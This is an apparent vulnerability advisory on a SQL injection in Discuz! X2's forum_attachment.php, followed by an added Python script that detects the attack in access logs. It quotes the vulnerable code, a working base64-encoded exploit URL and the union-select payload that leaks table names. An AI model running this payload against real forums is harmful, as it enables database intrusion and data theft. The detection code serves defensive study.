Discuz! X2 SQL injection 0day vulnerability - vulnerability warning - Black Bar Safety Net

2012-03-09T00:00:00
ID MYHACK58:62201233302
Type myhack58
Reporter Anonymous
Modified 2012-03-09T00:00:00

Description

File: source\module\forum\forum_attachment.php

if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}

define('NOROBOT', TRUE);

// aid arrives base64-encoded as "aid|k|t|uid|tableid"; the first field overwrites $_G['gp_aid']
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));

// the decoded value is interpolated into the query without escaping
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
    dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
}

The aid parameter is base64-decoded and then placed directly into the SQL query without any escaping, which results in an SQL injection vulnerability.

http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2Vszwn0idesvefctevftkfnrsbmcm9tiElORk9STUFUSU9OX1NDSEVNQS5UQUJMRvmgd2hlcmugvefctevfu0niru1bpwrhdgfiyxnlkckgyw5kicbuqujmrv9oqu1fiGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D

After the redirect, the URL becomes:

http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

This leaks the table name pre_common_admincp_member in the ptid parameter.

The actual query is:

// the trailing |x|x|x|x fills the k, t, uid and tableid slots of the explode() above
$x = "1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die(urlencode(base64_encode($x)));
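As an added defender-side example (not part of the advisory and not Discuz! code), the following Python decodes the aid parameter exactly as forum_attachment.php does and flags any attachment request whose first decoded field is not a plain integer, which is what a numeric check on aid would have rejected. The access-log format, IP addresses and field values are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

def encode_aid(fields):
    # Pack fields as Discuz! does: 'aid|k|t|uid|tableid' -> base64 -> URL-encoded
    return quote(base64.b64encode("|".join(fields).encode()).decode(), safe="")

def decode_aid(raw):
    # Mirror forum_attachment.php: base64-decode, then split on '|'; None if not base64
    try:
        decoded = base64.b64decode(unquote(raw), validate=True)
    except (binascii.Error, ValueError):
        return None
    return decoded.decode("utf-8", errors="replace").split("|")

def is_injection_attempt(raw):
    # The first field lands unescaped in WHERE aid='...'; a real id is a plain integer
    fields = decode_aid(raw)
    if fields is None:
        return True
    return re.fullmatch(r"[0-9]+", fields[0]) is None

def scan_access_log(lines):
    # Return (line number, decoded aid) for attachment requests with a non-numeric aid
    hits = []
    for no, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group(1)).query)  # parse_qs URL-decodes the value
        if qs.get("mod") != ["attachment"] or "aid" not in qs:
            continue
        if is_injection_attempt(qs["aid"][0]):
            fields = decode_aid(qs["aid"][0])
            hits.append((no, fields[0] if fields else None))
    return hits

# Constructed sample log: a normal download, an unrelated request, and a request
# carrying the query quoted in the advisory (packed the same way the exploit URL is).
ADVISORY_QUERY = ("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES "
                  "where TABLE_SCHEMA=database() and TABLE_NAME like '%_member")
GOOD_AID = encode_aid(["123", "abcd1234", "1331222400", "5", "0"])
BAD_AID = encode_aid([ADVISORY_QUERY, "x", "x", "x", "x"])
SAMPLE_LOG = [
    f'10.0.0.5 - - [09/Mar/2012:10:00:01 +0800] "GET /forum.php?mod=attachment&aid={GOOD_AID} HTTP/1.1" 302 -',
    '10.0.0.9 - - [09/Mar/2012:10:00:07 +0800] "GET /forum.php?mod=viewthread&tid=77 HTTP/1.1" 200 5120',
    f'10.0.0.7 - - [09/Mar/2012:10:00:12 +0800] "GET /forum.php?mod=attachment&findpost=ss&aid={BAD_AID} HTTP/1.1" 302 -',
]
```

Running scan_access_log(SAMPLE_LOG) reports only the third line, with the union query as the decoded aid field.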